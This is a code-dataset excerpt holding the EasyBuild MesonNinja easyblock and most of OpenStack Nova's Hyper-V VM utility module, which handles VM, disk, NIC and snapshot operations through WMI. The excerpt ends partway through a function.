repo_name (string, 5-100 chars) | path (string, 4-299 chars) | copies (string, 990 classes) | size (string, 4-7 chars) | content (string, 666-1.03M chars) | license (string, 15 classes) | hash (int64) | line_mean (float64, 3.17-100) | line_max (int64, 7-1k) | alpha_frac (float64, 0.25-0.98) | autogenerated (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
akesandgren/easybuild-easyblocks | easybuild/easyblocks/generic/mesonninja.py | 2 | 4665 |
##
# Copyright 2018-2021 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for installing software with Meson & Ninja.
@author: Kenneth Hoste (Ghent University)
"""
from easybuild.framework.easyblock import EasyBlock
from easybuild.framework.easyconfig import CUSTOM
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import change_dir, create_unused_dir, which
from easybuild.tools.run import run_cmd
class MesonNinja(EasyBlock):
"""
Support for building and installing software with 'meson' and 'ninja'.
"""
@staticmethod
def extra_options(extra_vars=None):
"""Define extra easyconfig parameters specific to MesonNinja."""
extra_vars = EasyBlock.extra_options(extra_vars)
extra_vars.update({
'separate_build_dir': [True, "Perform build in a separate directory", CUSTOM],
})
return extra_vars
def configure_step(self, cmd_prefix=''):
"""
Configure with Meson.
"""
# make sure both Meson and Ninja are included as build dependencies
build_dep_names = [d['name'] for d in self.cfg.builddependencies()]
for tool in ['Ninja', 'Meson']:
if tool not in build_dep_names:
raise EasyBuildError("%s not included as build dependency", tool)
cmd = tool.lower()
if not which(cmd):
raise EasyBuildError("'%s' command not found", cmd)
if self.cfg.get('separate_build_dir', True):
builddir = create_unused_dir(self.builddir, 'easybuild_obj')
change_dir(builddir)
# Make sure libdir doesn't get set to lib/x86_64-linux-gnu or something
# on Debian/Ubuntu multiarch systems and others.
no_Dlibdir = '-Dlibdir' not in self.cfg['configopts']
no_libdir = '--libdir' not in self.cfg['configopts']
if no_Dlibdir and no_libdir:
self.cfg.update('configopts', '-Dlibdir=lib')
cmd = "%(preconfigopts)s meson --prefix %(installdir)s %(configopts)s %(sourcedir)s" % {
'configopts': self.cfg['configopts'],
'installdir': self.installdir,
'preconfigopts': self.cfg['preconfigopts'],
'sourcedir': self.start_dir,
}
(out, _) = run_cmd(cmd, log_all=True, simple=False)
return out
def build_step(self, verbose=False, path=None):
"""
Build with Ninja.
"""
parallel = ''
if self.cfg['parallel']:
parallel = "-j %s" % self.cfg['parallel']
cmd = "%(prebuildopts)s ninja %(parallel)s %(buildopts)s" % {
'buildopts': self.cfg['buildopts'],
'parallel': parallel,
'prebuildopts': self.cfg['prebuildopts'],
}
(out, _) = run_cmd(cmd, log_all=True, simple=False)
return out
def test_step(self):
"""
Run tests using Ninja.
"""
if self.cfg['runtest']:
cmd = "%s %s %s" % (self.cfg['pretestopts'], self.cfg['runtest'], self.cfg['testopts'])
(out, _) = run_cmd(cmd, log_all=True, simple=False)
return out
def install_step(self):
"""
Install with 'ninja install'.
"""
parallel = ''
if self.cfg['parallel']:
parallel = "-j %s" % self.cfg['parallel']
cmd = "%(preinstallopts)s ninja %(parallel)s %(installopts)s install" % {
'installopts': self.cfg['installopts'],
'parallel': parallel,
'preinstallopts': self.cfg['preinstallopts'],
}
(out, _) = run_cmd(cmd, log_all=True, simple=False)
return out
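# A minimal usage sketch (not part of the original easyblock; the paths,
# option strings and parallelism value below are hypothetical examples).
# It shows the shell commands that configure_step(), build_step() and
# install_step() above assemble through string templating.
if __name__ == '__main__':
    example = {
        'preconfigopts': '',
        'installdir': '/opt/software/example/1.0',
        'configopts': '-Dlibdir=lib',
        'sourcedir': '/tmp/build/example-1.0',
    }
    configure_cmd = ("%(preconfigopts)s meson --prefix %(installdir)s "
                     "%(configopts)s %(sourcedir)s" % example)
    build_cmd = "ninja -j %s" % 4
    install_cmd = "ninja -j %s install" % 4
    print(configure_cmd.strip())
    print(build_cmd)
    print(install_cmd)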
| gpl-2.0 | -8,218,191,165,245,638,000 | 36.620968 | 99 | 0.621008 | false |
nikesh-mahalka/nova | nova/virt/hyperv/vmutils.py | 5 | 35501 |
# Copyright (c) 2010 Cloud.com, Inc
# Copyright 2012 Cloudbase Solutions Srl / Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VM related operations on Hyper-V.
"""
import sys
import time
import uuid
if sys.platform == 'win32':
import wmi
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
import six
from six.moves import range
from nova import exception
from nova.i18n import _, _LW
from nova.virt.hyperv import constants
from nova.virt.hyperv import hostutils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# TODO(alexpilotti): Move the exceptions to a separate module
# TODO(alexpilotti): Add more domain exceptions
class HyperVException(exception.NovaException):
def __init__(self, message=None):
super(HyperVException, self).__init__(message)
# TODO(alexpilotti): Add a storage exception base class
class VHDResizeException(HyperVException):
def __init__(self, message=None):
        super(VHDResizeException, self).__init__(message)
class HyperVAuthorizationException(HyperVException):
def __init__(self, message=None):
        super(HyperVAuthorizationException, self).__init__(message)
class UnsupportedConfigDriveFormatException(HyperVException):
def __init__(self, message=None):
        super(UnsupportedConfigDriveFormatException, self).__init__(message)
class VMUtils(object):
# These constants can be overridden by inherited classes
_PHYS_DISK_RES_SUB_TYPE = 'Microsoft Physical Disk Drive'
_DISK_DRIVE_RES_SUB_TYPE = 'Microsoft Synthetic Disk Drive'
_DVD_DRIVE_RES_SUB_TYPE = 'Microsoft Synthetic DVD Drive'
_HARD_DISK_RES_SUB_TYPE = 'Microsoft Virtual Hard Disk'
_DVD_DISK_RES_SUB_TYPE = 'Microsoft Virtual CD/DVD Disk'
_IDE_CTRL_RES_SUB_TYPE = 'Microsoft Emulated IDE Controller'
_SCSI_CTRL_RES_SUB_TYPE = 'Microsoft Synthetic SCSI Controller'
_SERIAL_PORT_RES_SUB_TYPE = 'Microsoft Serial Port'
_SETTINGS_DEFINE_STATE_CLASS = 'Msvm_SettingsDefineState'
_VIRTUAL_SYSTEM_SETTING_DATA_CLASS = 'Msvm_VirtualSystemSettingData'
_RESOURCE_ALLOC_SETTING_DATA_CLASS = 'Msvm_ResourceAllocationSettingData'
_PROCESSOR_SETTING_DATA_CLASS = 'Msvm_ProcessorSettingData'
_MEMORY_SETTING_DATA_CLASS = 'Msvm_MemorySettingData'
_SERIAL_PORT_SETTING_DATA_CLASS = _RESOURCE_ALLOC_SETTING_DATA_CLASS
_STORAGE_ALLOC_SETTING_DATA_CLASS = _RESOURCE_ALLOC_SETTING_DATA_CLASS
_SYNTHETIC_ETHERNET_PORT_SETTING_DATA_CLASS = \
'Msvm_SyntheticEthernetPortSettingData'
_AFFECTED_JOB_ELEMENT_CLASS = "Msvm_AffectedJobElement"
_COMPUTER_SYSTEM_CLASS = "Msvm_ComputerSystem"
_VM_ENABLED_STATE_PROP = "EnabledState"
_SHUTDOWN_COMPONENT = "Msvm_ShutdownComponent"
_VIRTUAL_SYSTEM_CURRENT_SETTINGS = 3
_AUTOMATIC_STARTUP_ACTION_NONE = 0
_PHYS_DISK_CONNECTION_ATTR = "HostResource"
_VIRT_DISK_CONNECTION_ATTR = "Connection"
_vm_power_states_map = {constants.HYPERV_VM_STATE_ENABLED: 2,
constants.HYPERV_VM_STATE_DISABLED: 3,
constants.HYPERV_VM_STATE_SHUTTING_DOWN: 4,
constants.HYPERV_VM_STATE_REBOOT: 10,
constants.HYPERV_VM_STATE_PAUSED: 32768,
constants.HYPERV_VM_STATE_SUSPENDED: 32769}
def __init__(self, host='.'):
self._enabled_states_map = {v: k for k, v in
six.iteritems(self._vm_power_states_map)}
if sys.platform == 'win32':
self._init_hyperv_wmi_conn(host)
self._conn_cimv2 = wmi.WMI(moniker='//%s/root/cimv2' % host)
        # On versions of Hyper-V prior to 2012, trying to directly set
        # properties on default setting data WMI objects results in an
        # exception.
        self._clone_wmi_objs = False
        if sys.platform == 'win32':
            host_utils = hostutils.HostUtils()
            self._clone_wmi_objs = not host_utils.check_min_windows_version(
                6, 2)
def _init_hyperv_wmi_conn(self, host):
self._conn = wmi.WMI(moniker='//%s/root/virtualization' % host)
def list_instance_notes(self):
instance_notes = []
for vs in self._conn.Msvm_VirtualSystemSettingData(
['ElementName', 'Notes'],
SettingType=self._VIRTUAL_SYSTEM_CURRENT_SETTINGS):
if vs.Notes is not None:
instance_notes.append(
(vs.ElementName, [v for v in vs.Notes.split('\n') if v]))
return instance_notes
def list_instances(self):
"""Return the names of all the instances known to Hyper-V."""
return [v.ElementName for v in
self._conn.Msvm_VirtualSystemSettingData(
['ElementName'],
SettingType=self._VIRTUAL_SYSTEM_CURRENT_SETTINGS)]
def get_vm_summary_info(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
vmsettings = vm.associators(
wmi_association_class=self._SETTINGS_DEFINE_STATE_CLASS,
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
settings_paths = [v.path_() for v in vmsettings]
# See http://msdn.microsoft.com/en-us/library/cc160706%28VS.85%29.aspx
(ret_val, summary_info) = vs_man_svc.GetSummaryInformation(
[constants.VM_SUMMARY_NUM_PROCS,
constants.VM_SUMMARY_ENABLED_STATE,
constants.VM_SUMMARY_MEMORY_USAGE,
constants.VM_SUMMARY_UPTIME],
settings_paths)
if ret_val:
raise HyperVException(_('Cannot get VM summary data for: %s')
% vm_name)
si = summary_info[0]
memory_usage = None
if si.MemoryUsage is not None:
memory_usage = long(si.MemoryUsage)
up_time = None
if si.UpTime is not None:
up_time = long(si.UpTime)
# Nova requires a valid state to be returned. Hyper-V has more
# states than Nova, typically intermediate ones and since there is
# no direct mapping for those, ENABLED is the only reasonable option
# considering that in all the non mappable states the instance
# is running.
enabled_state = self._enabled_states_map.get(si.EnabledState,
constants.HYPERV_VM_STATE_ENABLED)
summary_info_dict = {'NumberOfProcessors': si.NumberOfProcessors,
'EnabledState': enabled_state,
'MemoryUsage': memory_usage,
'UpTime': up_time}
return summary_info_dict
def _lookup_vm_check(self, vm_name):
vm = self._lookup_vm(vm_name)
if not vm:
raise exception.NotFound(_('VM not found: %s') % vm_name)
return vm
def _lookup_vm(self, vm_name):
vms = self._conn.Msvm_ComputerSystem(ElementName=vm_name)
n = len(vms)
if n == 0:
return None
elif n > 1:
raise HyperVException(_('Duplicate VM name found: %s') % vm_name)
else:
return vms[0]
def vm_exists(self, vm_name):
return self._lookup_vm(vm_name) is not None
def get_vm_id(self, vm_name):
vm = self._lookup_vm_check(vm_name)
return vm.Name
def _get_vm_setting_data(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
# Avoid snapshots
return [s for s in vmsettings if s.SettingType == 3][0]
def _set_vm_memory(self, vm, vmsetting, memory_mb, dynamic_memory_ratio):
mem_settings = vmsetting.associators(
wmi_result_class=self._MEMORY_SETTING_DATA_CLASS)[0]
max_mem = long(memory_mb)
mem_settings.Limit = max_mem
if dynamic_memory_ratio > 1:
mem_settings.DynamicMemoryEnabled = True
# Must be a multiple of 2
reserved_mem = min(
long(max_mem / dynamic_memory_ratio) >> 1 << 1,
max_mem)
else:
mem_settings.DynamicMemoryEnabled = False
reserved_mem = max_mem
mem_settings.Reservation = reserved_mem
# Start with the minimum memory
mem_settings.VirtualQuantity = reserved_mem
self._modify_virt_resource(mem_settings, vm.path_())
def _set_vm_vcpus(self, vm, vmsetting, vcpus_num, limit_cpu_features):
procsetting = vmsetting.associators(
wmi_result_class=self._PROCESSOR_SETTING_DATA_CLASS)[0]
vcpus = long(vcpus_num)
procsetting.VirtualQuantity = vcpus
procsetting.Reservation = vcpus
procsetting.Limit = 100000 # static assignment to 100%
procsetting.LimitProcessorFeatures = limit_cpu_features
self._modify_virt_resource(procsetting, vm.path_())
def update_vm(self, vm_name, memory_mb, vcpus_num, limit_cpu_features,
dynamic_memory_ratio):
vm = self._lookup_vm_check(vm_name)
vmsetting = self._get_vm_setting_data(vm)
self._set_vm_memory(vm, vmsetting, memory_mb, dynamic_memory_ratio)
self._set_vm_vcpus(vm, vmsetting, vcpus_num, limit_cpu_features)
def check_admin_permissions(self):
if not self._conn.Msvm_VirtualSystemManagementService():
msg = _("The Windows account running nova-compute on this Hyper-V"
" host doesn't have the required permissions to create or"
" operate the virtual machine.")
raise HyperVAuthorizationException(msg)
def create_vm(self, vm_name, memory_mb, vcpus_num, limit_cpu_features,
dynamic_memory_ratio, vm_gen, instance_path, notes=None):
"""Creates a VM."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
LOG.debug('Creating VM %s', vm_name)
vm = self._create_vm_obj(vs_man_svc, vm_name, vm_gen, notes,
dynamic_memory_ratio, instance_path)
vmsetting = self._get_vm_setting_data(vm)
LOG.debug('Setting memory for vm %s', vm_name)
self._set_vm_memory(vm, vmsetting, memory_mb, dynamic_memory_ratio)
LOG.debug('Set vCPUs for vm %s', vm_name)
self._set_vm_vcpus(vm, vmsetting, vcpus_num, limit_cpu_features)
def _create_vm_obj(self, vs_man_svc, vm_name, vm_gen, notes,
dynamic_memory_ratio, instance_path):
vs_gs_data = self._conn.Msvm_VirtualSystemGlobalSettingData.new()
vs_gs_data.ElementName = vm_name
# Don't start automatically on host boot
vs_gs_data.AutomaticStartupAction = self._AUTOMATIC_STARTUP_ACTION_NONE
vs_gs_data.ExternalDataRoot = instance_path
vs_gs_data.SnapshotDataRoot = instance_path
(vm_path,
job_path,
ret_val) = vs_man_svc.DefineVirtualSystem([], None,
vs_gs_data.GetText_(1))
self.check_ret_val(ret_val, job_path)
vm = self._get_wmi_obj(vm_path)
if notes:
vmsetting = self._get_vm_setting_data(vm)
vmsetting.Notes = '\n'.join(notes)
self._modify_virtual_system(vs_man_svc, vm_path, vmsetting)
return self._get_wmi_obj(vm_path)
def _modify_virtual_system(self, vs_man_svc, vm_path, vmsetting):
(job_path, ret_val) = vs_man_svc.ModifyVirtualSystem(
ComputerSystem=vm_path,
SystemSettingData=vmsetting.GetText_(1))[1:]
self.check_ret_val(ret_val, job_path)
def get_vm_scsi_controller(self, vm_name):
vm = self._lookup_vm_check(vm_name)
return self._get_vm_scsi_controller(vm)
def _get_vm_scsi_controller(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
res = [r for r in rasds
if r.ResourceSubType == self._SCSI_CTRL_RES_SUB_TYPE][0]
return res.path_()
def _get_vm_ide_controller(self, vm, ctrller_addr):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
ide_ctrls = [r for r in rasds
if r.ResourceSubType == self._IDE_CTRL_RES_SUB_TYPE
and r.Address == str(ctrller_addr)]
return ide_ctrls[0].path_() if ide_ctrls else None
def get_vm_ide_controller(self, vm_name, ctrller_addr):
vm = self._lookup_vm_check(vm_name)
return self._get_vm_ide_controller(vm, ctrller_addr)
def get_attached_disks(self, scsi_controller_path):
volumes = self._conn.query(
self._get_attached_disks_query_string(scsi_controller_path))
return volumes
def _get_attached_disks_query_string(self, scsi_controller_path):
return ("SELECT * FROM %(class_name)s WHERE ("
"ResourceSubType='%(res_sub_type)s' OR "
"ResourceSubType='%(res_sub_type_virt)s') AND "
"Parent='%(parent)s'" % {
'class_name': self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
'res_sub_type': self._PHYS_DISK_RES_SUB_TYPE,
'res_sub_type_virt': self._DISK_DRIVE_RES_SUB_TYPE,
'parent': scsi_controller_path.replace("'", "''")})
def _get_new_setting_data(self, class_name):
obj = self._conn.query("SELECT * FROM %s WHERE InstanceID "
"LIKE '%%\\Default'" % class_name)[0]
return self._check_clone_wmi_obj(class_name, obj)
def _get_new_resource_setting_data(self, resource_sub_type,
class_name=None):
if class_name is None:
class_name = self._RESOURCE_ALLOC_SETTING_DATA_CLASS
obj = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = "
"'%(res_sub_type)s' AND "
"InstanceID LIKE '%%\\Default'" %
{"class_name": class_name,
"res_sub_type": resource_sub_type})[0]
return self._check_clone_wmi_obj(class_name, obj)
def _check_clone_wmi_obj(self, class_name, obj):
if self._clone_wmi_objs:
return self._clone_wmi_obj(class_name, obj)
else:
return obj
def _clone_wmi_obj(self, class_name, obj):
wmi_class = getattr(self._conn, class_name)
new_obj = wmi_class.new()
# Copy the properties from the original.
for prop in obj._properties:
value = obj.Properties_.Item(prop).Value
new_obj.Properties_.Item(prop).Value = value
return new_obj
def attach_scsi_drive(self, vm_name, path, drive_type=constants.DISK):
vm = self._lookup_vm_check(vm_name)
ctrller_path = self._get_vm_scsi_controller(vm)
drive_addr = self.get_free_controller_slot(ctrller_path)
self.attach_drive(vm_name, path, ctrller_path, drive_addr, drive_type)
def attach_ide_drive(self, vm_name, path, ctrller_addr, drive_addr,
drive_type=constants.DISK):
vm = self._lookup_vm_check(vm_name)
ctrller_path = self._get_vm_ide_controller(vm, ctrller_addr)
self.attach_drive(vm_name, path, ctrller_path, drive_addr, drive_type)
def attach_drive(self, vm_name, path, ctrller_path, drive_addr,
drive_type=constants.DISK):
"""Create a drive and attach it to the vm."""
vm = self._lookup_vm_check(vm_name)
if drive_type == constants.DISK:
res_sub_type = self._DISK_DRIVE_RES_SUB_TYPE
elif drive_type == constants.DVD:
res_sub_type = self._DVD_DRIVE_RES_SUB_TYPE
drive = self._get_new_resource_setting_data(res_sub_type)
# Set the ctrller as parent.
drive.Parent = ctrller_path
drive.Address = drive_addr
# Add the cloned disk drive object to the vm.
new_resources = self._add_virt_resource(drive, vm.path_())
drive_path = new_resources[0]
if drive_type == constants.DISK:
res_sub_type = self._HARD_DISK_RES_SUB_TYPE
elif drive_type == constants.DVD:
res_sub_type = self._DVD_DISK_RES_SUB_TYPE
res = self._get_new_resource_setting_data(res_sub_type)
# Set the new drive as the parent.
res.Parent = drive_path
res.Connection = [path]
# Add the new vhd object as a virtual hard disk to the vm.
self._add_virt_resource(res, vm.path_())
def create_scsi_controller(self, vm_name):
"""Create an iscsi controller ready to mount volumes."""
vm = self._lookup_vm_check(vm_name)
scsicontrl = self._get_new_resource_setting_data(
self._SCSI_CTRL_RES_SUB_TYPE)
scsicontrl.VirtualSystemIdentifiers = ['{' + str(uuid.uuid4()) + '}']
self._add_virt_resource(scsicontrl, vm.path_())
def attach_volume_to_controller(self, vm_name, controller_path, address,
mounted_disk_path):
"""Attach a volume to a controller."""
vm = self._lookup_vm_check(vm_name)
diskdrive = self._get_new_resource_setting_data(
self._PHYS_DISK_RES_SUB_TYPE)
diskdrive.Address = address
diskdrive.Parent = controller_path
diskdrive.HostResource = [mounted_disk_path]
self._add_virt_resource(diskdrive, vm.path_())
def _get_disk_resource_address(self, disk_resource):
return disk_resource.Address
def set_disk_host_resource(self, vm_name, controller_path, address,
mounted_disk_path):
disk_found = False
vm = self._lookup_vm_check(vm_name)
(disk_resources, volume_resources) = self._get_vm_disks(vm)
for disk_resource in disk_resources + volume_resources:
if (disk_resource.Parent == controller_path and
self._get_disk_resource_address(disk_resource) ==
str(address)):
if (disk_resource.HostResource and
disk_resource.HostResource[0] != mounted_disk_path):
LOG.debug('Updating disk host resource "%(old)s" to '
'"%(new)s"' %
{'old': disk_resource.HostResource[0],
'new': mounted_disk_path})
disk_resource.HostResource = [mounted_disk_path]
self._modify_virt_resource(disk_resource, vm.path_())
disk_found = True
break
if not disk_found:
LOG.warning(_LW('Disk not found on controller '
'"%(controller_path)s" with '
'address "%(address)s"'),
{'controller_path': controller_path,
'address': address})
def set_nic_connection(self, vm_name, nic_name, vswitch_conn_data):
nic_data = self._get_nic_data_by_name(nic_name)
nic_data.Connection = [vswitch_conn_data]
vm = self._lookup_vm_check(vm_name)
self._modify_virt_resource(nic_data, vm.path_())
def _get_nic_data_by_name(self, name):
return self._conn.Msvm_SyntheticEthernetPortSettingData(
ElementName=name)[0]
def create_nic(self, vm_name, nic_name, mac_address):
"""Create a (synthetic) nic and attach it to the vm."""
# Create a new nic
new_nic_data = self._get_new_setting_data(
self._SYNTHETIC_ETHERNET_PORT_SETTING_DATA_CLASS)
# Configure the nic
new_nic_data.ElementName = nic_name
new_nic_data.Address = mac_address.replace(':', '')
new_nic_data.StaticMacAddress = 'True'
new_nic_data.VirtualSystemIdentifiers = ['{' + str(uuid.uuid4()) + '}']
# Add the new nic to the vm
vm = self._lookup_vm_check(vm_name)
self._add_virt_resource(new_nic_data, vm.path_())
def soft_shutdown_vm(self, vm_name):
vm = self._lookup_vm_check(vm_name)
shutdown_component = vm.associators(
wmi_result_class=self._SHUTDOWN_COMPONENT)
if not shutdown_component:
# If no shutdown_component is found, it means the VM is already
# in a shutdown state.
return
reason = 'Soft shutdown requested by OpenStack Nova.'
(ret_val, ) = shutdown_component[0].InitiateShutdown(Force=False,
Reason=reason)
self.check_ret_val(ret_val, None)
def set_vm_state(self, vm_name, req_state):
"""Set the desired state of the VM."""
vm = self._lookup_vm_check(vm_name)
(job_path,
ret_val) = vm.RequestStateChange(self._vm_power_states_map[req_state])
# Invalid state for current operation (32775) typically means that
# the VM is already in the state requested
self.check_ret_val(ret_val, job_path, [0, 32775])
LOG.debug("Successfully changed vm state of %(vm_name)s "
"to %(req_state)s",
{'vm_name': vm_name, 'req_state': req_state})
def _get_disk_resource_disk_path(self, disk_resource):
return disk_resource.Connection
def get_vm_storage_paths(self, vm_name):
vm = self._lookup_vm_check(vm_name)
(disk_resources, volume_resources) = self._get_vm_disks(vm)
volume_drives = []
for volume_resource in volume_resources:
drive_path = volume_resource.HostResource[0]
volume_drives.append(drive_path)
disk_files = []
for disk_resource in disk_resources:
disk_files.extend(
[c for c in self._get_disk_resource_disk_path(disk_resource)])
return (disk_files, volume_drives)
def _get_vm_disks(self, vm):
vmsettings = vm.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._STORAGE_ALLOC_SETTING_DATA_CLASS)
disk_resources = [r for r in rasds if
r.ResourceSubType in
[self._HARD_DISK_RES_SUB_TYPE,
self._DVD_DISK_RES_SUB_TYPE]]
if (self._RESOURCE_ALLOC_SETTING_DATA_CLASS !=
self._STORAGE_ALLOC_SETTING_DATA_CLASS):
rasds = vmsettings[0].associators(
wmi_result_class=self._RESOURCE_ALLOC_SETTING_DATA_CLASS)
volume_resources = [r for r in rasds if
r.ResourceSubType == self._PHYS_DISK_RES_SUB_TYPE]
return (disk_resources, volume_resources)
def destroy_vm(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
# Remove the VM. Does not destroy disks.
(job_path, ret_val) = vs_man_svc.DestroyVirtualSystem(vm.path_())
self.check_ret_val(ret_val, job_path)
def check_ret_val(self, ret_val, job_path, success_values=[0]):
if ret_val == constants.WMI_JOB_STATUS_STARTED:
return self._wait_for_job(job_path)
elif ret_val not in success_values:
raise HyperVException(_('Operation failed with return value: %s')
% ret_val)
def _wait_for_job(self, job_path):
"""Poll WMI job state and wait for completion."""
job = self._get_wmi_obj(job_path)
while job.JobState == constants.WMI_JOB_STATE_RUNNING:
time.sleep(0.1)
job = self._get_wmi_obj(job_path)
if job.JobState != constants.WMI_JOB_STATE_COMPLETED:
job_state = job.JobState
if job.path().Class == "Msvm_ConcreteJob":
err_sum_desc = job.ErrorSummaryDescription
err_desc = job.ErrorDescription
err_code = job.ErrorCode
raise HyperVException(_("WMI job failed with status "
"%(job_state)d. Error details: "
"%(err_sum_desc)s - %(err_desc)s - "
"Error code: %(err_code)d") %
{'job_state': job_state,
'err_sum_desc': err_sum_desc,
'err_desc': err_desc,
'err_code': err_code})
else:
(error, ret_val) = job.GetError()
if not ret_val and error:
raise HyperVException(_("WMI job failed with status "
"%(job_state)d. Error details: "
"%(error)s") %
{'job_state': job_state,
'error': error})
else:
raise HyperVException(_("WMI job failed with status "
"%d. No error "
"description available") %
job_state)
desc = job.Description
elap = job.ElapsedTime
LOG.debug("WMI job succeeded: %(desc)s, Elapsed=%(elap)s",
{'desc': desc, 'elap': elap})
return job
def _get_wmi_obj(self, path):
return wmi.WMI(moniker=path.replace('\\', '/'))
def _add_virt_resource(self, res_setting_data, vm_path):
"""Adds a new resource to the VM."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
res_xml = [res_setting_data.GetText_(1)]
(job_path,
new_resources,
ret_val) = vs_man_svc.AddVirtualSystemResources(res_xml, vm_path)
self.check_ret_val(ret_val, job_path)
return new_resources
def _modify_virt_resource(self, res_setting_data, vm_path):
"""Updates a VM resource."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.ModifyVirtualSystemResources(
ResourceSettingData=[res_setting_data.GetText_(1)],
ComputerSystem=vm_path)
self.check_ret_val(ret_val, job_path)
def _remove_virt_resource(self, res_setting_data, vm_path):
"""Removes a VM resource."""
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
res_path = [res_setting_data.path_()]
(job_path, ret_val) = vs_man_svc.RemoveVirtualSystemResources(res_path,
vm_path)
self.check_ret_val(ret_val, job_path)
def take_vm_snapshot(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val,
snp_setting_data) = vs_man_svc.CreateVirtualSystemSnapshot(vm.path_())
self.check_ret_val(ret_val, job_path)
job_wmi_path = job_path.replace('\\', '/')
job = wmi.WMI(moniker=job_wmi_path)
snp_setting_data = job.associators(
wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)[0]
return snp_setting_data.path_()
def remove_vm_snapshot(self, snapshot_path):
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.RemoveVirtualSystemSnapshot(
snapshot_path)
self.check_ret_val(ret_val, job_path)
def detach_vm_disk(self, vm_name, disk_path, is_physical=True):
vm = self._lookup_vm_check(vm_name)
disk_resource = self._get_mounted_disk_resource_from_path(disk_path,
is_physical)
if disk_resource:
parent = self._conn.query("SELECT * FROM "
"Msvm_ResourceAllocationSettingData "
"WHERE __PATH = '%s'" %
disk_resource.Parent)[0]
self._remove_virt_resource(disk_resource, vm.path_())
if not is_physical:
self._remove_virt_resource(parent, vm.path_())
def _get_mounted_disk_resource_from_path(self, disk_path, is_physical):
if is_physical:
class_name = self._RESOURCE_ALLOC_SETTING_DATA_CLASS
res_sub_type = self._PHYS_DISK_RES_SUB_TYPE
conn_attr = self._PHYS_DISK_CONNECTION_ATTR
else:
class_name = self._STORAGE_ALLOC_SETTING_DATA_CLASS
res_sub_type = self._HARD_DISK_RES_SUB_TYPE
conn_attr = self._VIRT_DISK_CONNECTION_ATTR
disk_resources = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = "
"'%(res_sub_type)s'" %
{"class_name": class_name,
"res_sub_type": res_sub_type})
for disk_resource in disk_resources:
conn = getattr(disk_resource, conn_attr, None)
if conn and conn[0].lower() == disk_path.lower():
return disk_resource
def get_mounted_disk_by_drive_number(self, device_number):
mounted_disks = self._conn.query("SELECT * FROM Msvm_DiskDrive "
"WHERE DriveNumber=" +
str(device_number))
if len(mounted_disks):
return mounted_disks[0].path_()
def get_controller_volume_paths(self, controller_path):
disks = self._conn.query("SELECT * FROM %(class_name)s "
"WHERE ResourceSubType = '%(res_sub_type)s' "
"AND Parent='%(parent)s'" %
{"class_name":
self._RESOURCE_ALLOC_SETTING_DATA_CLASS,
"res_sub_type":
self._PHYS_DISK_RES_SUB_TYPE,
"parent":
controller_path})
disk_data = {}
for disk in disks:
if disk.HostResource:
disk_data[disk.path().RelPath] = disk.HostResource[0]
return disk_data
def get_free_controller_slot(self, scsi_controller_path):
attached_disks = self.get_attached_disks(scsi_controller_path)
used_slots = [int(self._get_disk_resource_address(disk))
for disk in attached_disks]
for slot in range(constants.SCSI_CONTROLLER_SLOTS_NUMBER):
if slot not in used_slots:
return slot
raise HyperVException(_("Exceeded the maximum number of slots"))
def enable_vm_metrics_collection(self, vm_name):
raise NotImplementedError(_("Metrics collection is not supported on "
"this version of Hyper-V"))
def get_vm_serial_port_connection(self, vm_name, update_connection=None):
vm = self._lookup_vm_check(vm_name)
vmsettings = vm.associators(
